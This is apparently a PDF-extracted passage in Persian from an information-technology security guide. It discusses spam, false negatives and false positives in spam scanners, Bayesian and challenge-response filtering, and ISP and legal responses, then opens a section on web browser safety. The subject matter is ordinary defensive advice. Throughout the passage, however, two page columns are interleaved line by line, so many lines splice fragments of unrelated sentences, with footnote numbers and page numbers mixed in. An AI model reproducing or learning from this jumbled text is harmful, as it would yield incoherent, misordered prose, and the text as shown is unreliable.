‫ﺩﺭ ﺁﻭﺭﺩ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﺤﺘﻮﺍﻱ ﻧﺎﻣﻪ ﻭ ﻣﻨﺸﺎﺀ ﺍﺭﺳﺎﻝ ﺁﻧﺮﺍ ﺑﺮﺭﺳﻲ‬ ‫ﻣﻄﻤﺌﻨﹰﺎ ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺴﺖ ﻭ ﻧﺒﺎﻳﺪ ﻏﺮﺑﺎﻝ ﺷﻮﺩ‪.‬‬
‫ﻣﻲﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺍﻳﻦ ﻣﻌﻴﺎﺭﻫﺎ ﺑﻪ ﺳـﺨﺘﻲ ﻗﺎﺑـﻞ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﺝ( ﭼــﺮﺍ ﻫﺮﺯﻧﺎﻣــﻪﻧــﻮﻳﺲﻫــﺎ ﺑــﺮﺍﻱ ﺍﻓــﺮﺍﺩ ﻫﺮﺯﻧﺎﻣــﻪ ﺍﺭﺳــﺎﻝ‬
‫ﻫﺴﺘﻨﺪ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪﻫـﺎ ﻧﻴـﺰ ﻣﻌﻤـﻮ ﹰﻻ ﺩﺍﺭﺍﻱ ﺗـﺸﺨﻴﺺ‬
‫ﻣﻲﻛﻨﻨﺪ؟ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺟﻮﺍﺏ‪ :‬ﭼﻮﻥ ﺍﻳﻨﻜﺎﺭ ﺟﻮﺍﺏ ﻣﻲﺩﻫـﺪ!‬
‫ﻣﻨﻔﻲ ﻧﺎﺩﺭﺳﺖ )‪ (False Negative‬ﻭ ﺗﺸﺨﻴﺺ ﻣﺜﺒﺖ ﻧﺎﺩﺭﺳـﺖ‬
‫ﺍﮔﺮ ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻴـﺪ ﺳـﺮﻳﻌﹰﺎ ﻣﺘﻮﺟـﻪ‬
‫)‪ (False Positive‬ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻻ ﻫﺮﺯﻧﺎﻣﻪﻫـﺎ ﺩﺭ ﻣـﻮﺭﺩ‬ ‫ﻳﻚ ﺍﻟﮕﻮ ﺩﺭ ﺁﻥ ﻣﻲﺷﻮﻳﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫‪False Negative‬‬ ‫ﻣﺴﺎﺋﻠﻲ ﻫﺴﺘﻨﺪ ﭼﻮﻥ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﭘﻮﻝ ﻳﺎ ﭘﺲﺍﻧﺪﺍﺯ ﺁﻥ‪،‬‬
‫‪ False‬ﺯﻣـﺎﻧﻲ ﺭﺥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺑﺮﻧﺎﻣـﺔ‬ ‫‪Negative‬‬ ‫ﺍﺭﺗﻘﺎﻱ ﺯﻧﺪﮔﻲ ﻋﺎﻃﻔﻲ ﻳﺎ ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻼﻣﺘﻲ‪.‬‬
‫ﺟﺴﺘﺠﻮﮔﺮ‪ ٧٥‬ﺍﻋﻼﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬ ‫ﺍﻳﻦ ﻣﻮﺿﻮﻋﺎﺕ ﻳﻚ ﻧﻘﻄﺔ ﻣﺸﺘﺮﻙ ﻣﻬﻢ ﺩﺍﺭﻧﺪ‪ :‬ﺍﻏﻠﺐ ﻣـﺎ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺴﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﻫﺮﺯﻧﺎﻣﻪ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑـﺪﺍﻥ‬ ‫ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺟﺪﻱ ﺩﺍﺭﻳﻢ ﻭ ﺗﻌﺪﺍﺩﻱ ﺍﺯ‬
‫ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﻫﺮﺯﻧﺎﻣـﻪ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺍﺯ‬ ‫ﻣﺎ ﻧﻴﺰ ﺗﻮﺟﻪ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﻪ ﺁﻧﻬﺎ ﻣﻲﻛﻨﻴﻢ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺣﺘﻲ‬
‫ﻏﺮﺑﺎﻝ ﻋﺒﻮﺭ ﻛﻨـﺪ ﻭ ﺑـﻪ ﻫﻤـﻴﻦ ﺩﻟﻴـﻞ ﺍﺳـﺖ ﻛـﻪ ﮔﻔﺘـﻪ‬ ‫ﺍﮔﺮ ﺩﺭﺻﺪ ﺑﺴﻴﺎﺭ ﺍﻧﺪﻛﻲ ﺍﺯ ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ‪ ،‬ﺍﻳﻦ ﻧﺎﻣﻪﻫـﺎ‬
‫ﻣﻲﺷﻮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ‪ %۱۰۰‬ﻣﺆﺛﺮ ﻧﺒﺎﺷﺪ‪.‬‬ ‫ﻼ ﭼﻴـﺰﻱ ﺣـﺪﻭﺩ ‪ ۱‬ﻧﺎﻣـﻪ ﺩﺭ ﻣﻴـﺎﻥ ﻫـﺮ‬ ‫ﺭﺍ ﭘﻴﮕﻴﺮﻱ ﻛﻨﻨـﺪ )ﻣـﺜ ﹰ‬
‫‪ ۱۰۰،۰۰۰‬ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﻩ( ﻫﺮﺯﻧﺎﻣﻪ ﻧﻮﻳﺲ ﻫـﺎﻳﻲ ﻛـﻪ ﭼﻨـﺪﻳﻦ‬
‫‪False Positive‬‬
‫ﻣﻴﻠﻴﻮﻥ ﭘﻴﺎﻡ ﺩﺭ ﺭﻭﺯ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﭘﻮﻝ ﺯﻳﺎﺩﻱ‬
‫‪ False Positive‬ﺑـــﺪﻳﻦ ﻣﻌﻨﺎﺳـــﺖ ﻛـــﻪ ﺑﺮﻧﺎﻣـــﺔ‬ ‫ﺍﺯ ﺍﻳﻦ ﺭﺍﻩ ﺑﺪﺳﺖ ﺁﻭﺭﻧﺪ‪.‬‬
‫ﺟﺴﺘﺠﻮﮔﺮ ﺍﻇﻬﺎﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﻧﺎﻣﻪﻫﺎﻱ ﺑﻲﺿـﺮﺭ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﺧـﺴﺎﺭﺗﻬﺎﻱ ﺯﻳـﺎﺩﻱ ﺑـﻪ ﺑـﺎﺭ‬ ‫ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﭼﻪ ﺑﺎﻳﺪ ﻛﺮﺩ؟‬
‫ﻣﻲﺁﻭﺭﺩ‪ ،‬ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﺩﺭ ﺍﺛـﺮ ﺍﻳـﻦ ﺗـﺸﺨﻴﺺ‪ ،‬ﻧﺎﻣـﺔ‬
‫ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﺗـﻮﺍﻥ‬
‫ﻓﺮﺳﺘﺎﺩﻩﺷﺪﻩ ﺑﺠﺎﻱ ﺗﺤﻮﻳﻞ ﺷﺪﻥ‪ ،‬ﺣﺬﻑ ﮔـﺮﺩﺩ‪ .‬ﻣﻤﻜـﻦ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﻣﺤﺪﻭﺩ ﻭ ﻛﻨﺘﺮﻝ ﻛـﺮﺩ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﺩﻭﻟﺘﻬـﺎ ﺩﺭ ﺣـﻮﺯﺓ‬
‫ﺍﺳﺖ ﺑﺎ ‪ False Positive‬ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻋﺎﺩﻱ‬
‫ﻗﻀﺎﻳﻲ ﺧﻮﺩ ﻗﻮﺍﻧﻴﻨﻲ ﺭﺍ ﺑﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ ﮔـﺴﺘﺮﺵ ﻫﺮﺯﻧﺎﻣـﻪ‬
‫ﻭ ﺑﻲﺿﺮﺭ ﺍﺯ ﺩﺳﺖ ﺑﺮﻭﻧﺪ ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﺑﺎﺯﻳﺎﺑﻲ ﺷﻮﻧﺪ‪.‬‬
‫ﺗــﺼﻮﻳﺐ ﻛــﺮﺩﻩﺍﻧــﺪ‪ .‬ﺍﻛﺜــﺮ ‪ISP‬ﻫــﺎ ﻣﻌﺘﻘﺪﻧــﺪ ﻛــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺗﺴﻬﻴﻼﺕ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺮﺧﻼﻑ ﺗﻮﺍﻓﻘﻨﺎﻣﻪﻫـﺎﻱ‬
‫ﻛﺎﺭﻱ ﺁﻧﻬﺎ ﺍﺳﺖ‪ .‬ﺗﺼﻮﻳﺐ ﭼﻨﻴﻦ ﻗﻮﺍﻧﻴﻨﻲ ﻣﻲ ﺗﻮﺍﻧﺪ ﻣـﺆﺛﺮ ﺑﺎﺷـﺪ‪،‬‬
‫‪74‬‬ ‫‪Mail Client‬‬
‫ﺍﻣﺎ ﺗﺎﻛﻨﻮﻥ ﺍﻋﻤﺎﻝ ﺍﻛﺜﺮ ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺑـﺴﻴﺎﺭ‬
‫‪75‬‬ ‫‪Scanning Program‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٨٤‬‬

‫ﺭﻭﺵ ﺍﻣﻴﺪﻭﺍﺭﻛﻨﻨــﺪﺓ ﺟﺪﻳــﺪ ﺿــﺪ ﻫﺮﺯﻧﺎﻣــﻪ ﺭﻭﺷــﻲ ﺑــﻪ ﻧــﺎﻡ‬ ‫ﻫﺪﻑ ﺑﺮﻧﺎﻣﻪ ﻫـﺎﻱ ﺟـﺴﺘﺠﻮﻱ ﻫﺮﺯﻧﺎﻣـﻪ ﺑـﻪ ﺣـﺪﺍﻗﻞ ﺭﺳـﺎﻧﺪﻥ‬
‫‪ Bayesian Filtering‬ﺍﺳـــﺖ‪ .‬ﺩﺭ ﺍﻳـــﻦ ﺭﻭﺵ ﻗـــﻮﺍﻧﻴﻦ‬ ‫‪ False Negative‬ﻭ ﺍﺯ ﺑــﻴﻦ ﺑــﺮﺩﻥ ‪False Positive‬‬
‫ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﺑﺎ ﺷﻨﺎﺧﺖ ﺷﻤﺎ ﺍﺯ ﻫﺮﺯﻧﺎﻣﻪ ﺍﺻﻼﺡ ﻣﻲ ﺷـﻮﺩ‪ .‬ﺍﻳـﻦ‬ ‫ﻻ‬
‫ﻣــﻲﺑﺎﺷــﺪ‪ .‬ﻣﺘﺄﺳــﻔﺎﻧﻪ ﻛــﺎﻫﺶ ‪ False Negative‬ﻣﻌﻤــﻮ ﹰ‬
‫ﻗﻮﺍﻧﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﻫﺮ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩﺍﻱ ﻣﺘﻐﻴـﺮ ﺑﺎﺷـﻨﺪ‪.‬‬ ‫‪ False Positive‬ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺑـﻪ ﻫـﺮ‬
‫ﻫﺪﻑ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ‪ ،‬ﺁﻣﻮﺯﺵ ﺩﻳﺪﻥ ﺑﺮﻧﺎﻣﻪ ﻏﺮﺑـﺎﻝﺳـﺎﺯ ﺍﺯ ﺭﻓﺘـﺎﺭ‬ ‫ﺩﻟﻴﻠﻲ ﻧﻴﺎﺯ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﺒﻴﻪ ﺑـﻪ ﻫﺮﺯﻧﺎﻣـﻪ‬
‫ﺷﻤﺎ ﺍﺳﺖ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﻓﺮﺩ ﻣﻮﺭﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫـﺪ ﻭ‬ ‫ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺍﻳﻦ ﻃﺮﻳﻖ ﺁﺳـﻴﺐ ﺑﻴﻨﻨـﺪ‪ .‬ﺁﺧـﺮﻳﻦ ﻧﻤﻮﻧـﺔ‬
‫ﻻ ﺑﻌﻨﻮﺍﻥ ﻫﺮﺯﻧﺎﻣﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻤﻲﺷـﻮﻧﺪ ﺍﻣـﺎ‬ ‫ﻣﺤﺘﻮﻳﺎﺗﻲ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬ ‫ﮔﺰﺍﺭﺵﺷﺪﺓ ﺍﻳﻦ ﺍﺗﻔﺎﻕ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺧﺒﺮﻧﺎﻣـﺔ ﺩﺍﻧـﺸﮕﺎﻫﻲ ﺑـﻮﺩ‬
‫ﺑﻪ ﻫﺮ ﺩﻟﻴﻠﻲ ﻣﻮﺭﺩ ﺗﻮﺟـﻪ ﺷـﻤﺎ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﺭﺩ ﻛﻨـﺪ‪ .‬ﺻـﺎﻓﻴﻬﺎﻱ‬ ‫ﻛﻪ ﺩﺭ ﺁﻥ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﻣﻄﺎﻟﺒﻲ ﻣﻄﺮﺡ ﺷـﺪﻩ ﺑـﻮﺩ‪ .‬ﺍﺯ‬
‫‪ bayesian‬ﺍﺯ ﻓﻨﻮﻥ ﺯﺑﺎﻥﺷﻨﺎﺳـﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ ﺗـﺎ ﺑـﻪ‬ ‫ﺁﻧﺠﺎ ﻛﻪ ﺧﺒﺮﻧﺎﻣﻪ ﺩﺍﺭﺍﻱ ﻣﺜﺎﻟﻬـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻫﺮﺯﻧﺎﻣـﻪﻫـﺎ ﺑـﻮﺩ‪،‬‬
‫ﻧﺎﻣﻪ ﻫﺎﻳﻲ ﺍﺟﺎﺯﺓ ﻋﺒﻮﺭ ﺩﻫﻨﺪ ﻛﻪ ﺣﺎﻭﻱ ﻟﻐﺎﺕ ﻣﺨﺼﻮﺻﻲ ﻫﺴﺘﻨﺪ‬ ‫ﺗﻮﺳﻂ ﺟـﺴﺘﺠﻮﮔﺮﻫﺎ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻫﺮﺯﻧﺎﻣـﻪ ﺷﻨﺎﺳـﺎﻳﻲ ﺷـﺪ ﻭ‬
‫ﻭ ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﮔﺬﺷﺘﺔ ﺭﻓﺘﺎﺭ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﻤﺎ ﺩﺭ‬ ‫‪ISP‬ﻫﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺁﻧﺮﺍ ﻏﺮﺑﺎﻝ ﻭ ﺣﺬﻑ ﻧﻤﻮﺩﻧﺪ‪.‬‬
‫ﻧﺎﻣﻪﻫﺎﻱ ﻭﺍﻗﻌﻴﺘﺎﻥ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﺍﻣﺎ ﺑﻨﺪﺭﺕ ﺩﺭ ﻫﺮﺯﻧﺎﻣـﻪ ﻇـﺎﻫﺮ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺟـﺴﺘﺠﻮﮔﺮﻫﺎﻱ ﻫﺮﺯﻧﺎﻣـﻪ‪ ،‬ﺭﻭﺷـﻬﺎﻱ ﻏﺮﺑـﺎﻝﺳـﺎﺯﻱ‬
‫ﻣﻲ ﺷﻮﻧﺪ‪ .‬ﺻﺎﻓﻴﻬﺎﻱ ‪ bayesian‬ﺑﺮﺍﻱ ﺍﻛﺜﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘـﺴﺖ‬ ‫ﻫﺮﺯﻧﺎﻣﻪ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﻓﻨﻮﻥ ﭘﺮﺳﺶ ‪ -‬ﭘﺎﺳﺦ‪ ٧٦‬ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﺭﻭﺵ ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻧﺎﻣـﻪﺍﻱ ﺍﺯ ﻳـﻚ ﻓﺮﺳـﺘﻨﺪﺓ‬
‫ﺍﮔﺮ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﺸﻜﻞﺁﻓﺮﻳﻦ ﺷﺪﻩ ﺍﺳـﺖ ﺑﺎﻳـﺪ ﺑﺮﺭﺳـﻲ‬ ‫ﻧﺎﺷﻨﺎﺱ ﺩﺭﻳﺎﻓﺖ ﻣﻲﺷﻮﺩ‪ ،‬ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ )ﻗﺒﻞ ﺍﺯ ﺍﻳﻨﻜﻪ ﮔﻴﺮﻧﺪﻩ ﺁﻧﺮﺍ ﺑﺎﺯ‬
‫ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ‪ ISP‬ﺷـﻤﺎ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﻏﺮﺑـﺎﻝﺳـﺎﺯﻱ‬ ‫ﻛﻨﺪ( ﻣﺘﻮﻗﻒ ﻣﻲ ﮔﺮﺩﺩ‪ .‬ﺳﭙﺲ ﭘﺮﺳﺸﻲ ﺑـﺮﺍﻱ ﻓﺮﺳـﺘﻨﺪﻩ ﺍﺭﺳـﺎﻝ‬
‫ﻫﺮﺯﻧﺎﻣﻪ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺎﻳـﺪ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ‬ ‫ﻣــﻲﺷــﻮﺩ ﻭ ﺩﺭ ﺁﻥ ﺍﺯ ﻭﻱ ﺩﺭﺧﻮﺍﺳــﺖ ﻣــﻲﮔــﺮﺩﺩ ﻧﺎﻣــﻪﺍﻱ ﻛــﻪ‬
‫ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻴـﺪ ﺗـﺎ ﻣﻌﻠـﻮﻡ ﺷـﻮﺩ ﺁﻳـﺎ‬ ‫ﻓﺮﺳﺘﺎﺩﻩ ﺍﺳﺖ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﻨﺪ ﺗـﺎ ﺛﺎﺑـﺖ ﺷـﻮﺩ ﺁﻥ ﻧﺎﻣـﻪ ﺍﺯ ﺳـﻮﻱ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﻫﺮﺯﻧﺎﻣﻪﻫﺎ ﺭﺍ ﻏﺮﺑﺎﻝ ﻧﻤﺎﻳﻨﺪ ﻳﺎ ﻧﻪ‪.‬‬ ‫ﻫﻤﺎﻥ ﻓﺮﺩ ﺍﺳﺖ ﻭ ﻧﻪ ﺍﺯ ﺟﺎﻧﺐ ﺷﺨﺺ ﺩﻳﮕﺮ ﻳﺎ ﻳﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ‪.‬‬
‫ﻓﺮﻡ ﺗﺄﻳﻴﺪﻳﻪ ﭼﻨﺎﻥ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﻛﻪ ﺑﻄـﻮﺭ ﺧﻮﺩﻛـﺎﺭ ﻧﻤـﻲﺗﻮﺍﻧـﺪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﻭﺏ‬ ‫ﻣﺪﻳﺮﻳﺖ ﺷﻮﺩ ﻭ ﻧﻴﺰ ﺑﺮﺍﻱ ﻫﺮﺯﻧﺎﻣﻪﻫﺎﻱ ﺑﻌﺪﻱ ﻣﺆﺛﺮ ﻧﻴﺴﺖ‪ .‬ﺍﮔـﺮ‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳﻦ ﻛﺘﺎﺏ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۳‬ﻧﻮﺷﺘﻪ ﺷﺪ‪ ،‬ﻭﺏ ﺣﺪﻭﺩ ‪۱۰‬‬ ‫ﺗﺎ ﭼﻨﺪ ﺭﻭﺯ ﻫﻴﭻ ﺗﺄﻳﻴﺪﻳﻪﺍﻱ ﺩﺭﻳﺎﻓﺖ ﻧﺸﻮﺩ‪ ،‬ﻧﺎﻣﻪ ﺑﺠـﺎﻱ ﺗﺤﻮﻳـﻞ‬
‫ﺳﺎﻝ ﺑﺎ ﺳﻄﻮﺡ ﺩﺳﺘﺮﺳﻲ ﻣﺨﺘﻠﻒ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ‬ ‫ﺷﺪﻥ‪ ،‬ﺣﺬﻑ ﻣﻲﮔﺮﺩﺩ‪ .‬ﻣﺸﻜﻞ ﺍﻳﻦ ﺭﻭﺵ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻧﻴﺎﺯﻣﻨـﺪ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻭﺟﻮﺩ ﻭﺏ ﺑـﺮﺍﻱ ﺁﻧﺪﺳـﺘﻪ ﺍﺯ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ‬ ‫ﻣﺪﺍﺧﻠﺔ ﺩﺳﺘﻲ ﻓﺮﺳﺘﻨﺪﻩ ﺍﺳﺖ‪ .‬ﺍﮔﺮ ﻧﺎﻣـﻪﺍﻱ ﺭﺍ ﺑﻔﺮﺳـﺘﻴﺪ ﻭ ﻗـﺎﺩﺭ‬
‫ﻣﺮﺗﺒﹰﺎ ﺩﺭ ﻛـﺎﺭ‪ ،‬ﻣﺪﺭﺳـﻪ ﻭ ﺗﻔـﺮﻳﺢ ﺍﺯ ﺷـﺒﻜﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨﻨـﺪ‬ ‫ﻧﺒﺎﺷﻴﺪ ﻛﻪ ﺑﻪ ﺩﺭﺧﻮﺍﺳﺖ ﺗﺄﻳﻴﺪﻳﻪ ﺳﺮﻳﻌﹰﺎ ﭘﺎﺳﺦ ﺩﻫﻴﺪ ﻧﺎﻣـﺔ ﺷـﻤﺎ‬
‫ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻭﺏ ﺑﺼﻮﺭﺕ ﺍﺑﺰﺍﺭﻱ ﻣﻔﻴﺪ ﻭ ﺭﺍﻳـﺞ ﺩﺭ‬ ‫ﺗﺤﻮﻳﻞ ﻧﺨﻮﺍﻫﺪ ﺷﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﺩﻭ ‪ ISP‬ﺑﺼﻮﺭﺕ ﻣﺘﻘﺎﺑـﻞ ﺍﺯ‬
‫ﺁﻣﺪﻩ‪ ،‬ﻓﺮﺍﻣﻮﺵ ﺷﺪﻩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺤﻴﻄﻲ ﺧﺼﻮﻣﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ‪.‬‬ ‫ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻫﺮﮔـﺰ ﺍﺯ ﻳﻜـﺪﻳﮕﺮ‬
‫ﻧﺎﻣـﻪﺍﻱ ﺩﺭﻳﺎﻓـﺖ ﻧﻜﻨﻨـﺪ؛ ﺯﻳـﺮﺍ ﺍﻭﻟـﻴﻦ ﺩﺭﻳﺎﻓـﺖﻛﻨﻨـﺪﻩ ﻧﺎﻣــﻪ ﺭﺍ‬
‫ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺷﺘﻦ ﻣﺮﻭﺭﮔﺮﻫﺎ‬ ‫ﻧﻤﻲﺑﻴﻨﺪ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﺗﺄﻳﻴـﺪ ﺷـﺪﻩ ﺑﺎﺷـﺪ‪ ،‬ﻭ ﺗﻘﺎﺿـﺎﻱ ﺗﺄﻳﻴـﺪ ﻧﻴـﺰ‬
‫ﺍﺭﺳﺎﻝ ﻧﺨﻮﺍﻫﺪ ﺷﺪ‪ ،‬ﭼﻮﻥ ﻓﺮﺳﺘﻨﺪﺓ ﺁﻥ ﻧﺎﺷﻨﺎﺱ ﺍﺳﺖ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ‬
‫ﺑﻄﻮﺭ ﻛﻠﻲ ﻭﺏ ﻧﺴﺒﺘﹰﺎ ﺍﻳﻤﻦ ﺍﺳـﺖ ﺍﻣـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺧﻄـﺮﺍﺕ‬
‫ﺻﺎﻓﻴﻬﺎﻱ ﻫﺮﺯﻧﺎﻣﻪ ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﻧﺎﻣﻪﻫـﺎﻱ ﻣـﺸﻜﻮﻙ ﺭﺍ ﺣـﺬﻑ‬
‫ﻻ ﺩﺍﺭﺍﻱ ﻣﺘﻨﻬـﺎ‬
‫ﺑﺎﻟﻘﻮﻩﺍﻱ ﻧﻴﺰ ﺩﺭ ﭘﻲ ﺩﺍﺭﺩ‪ .‬ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﻌﻤﻮ ﹰ‬
‫ﻛﻨﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﻳﻚ ﭘﻮﺷﺔ ﻣﺨﺼﻮﺹ ﻗﺮﺍﺭ ﻣﻲ ﺩﻫﻨـﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ‬
‫ﻭ ﺗﺼﺎﻭﻳﺮ ﺍﻳﺴﺘﺎ‪ ٧٧‬ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﭘﻮﻳﺎﻳﻲ ﻧﻴﺰ‬
‫‪٧٨‬‬
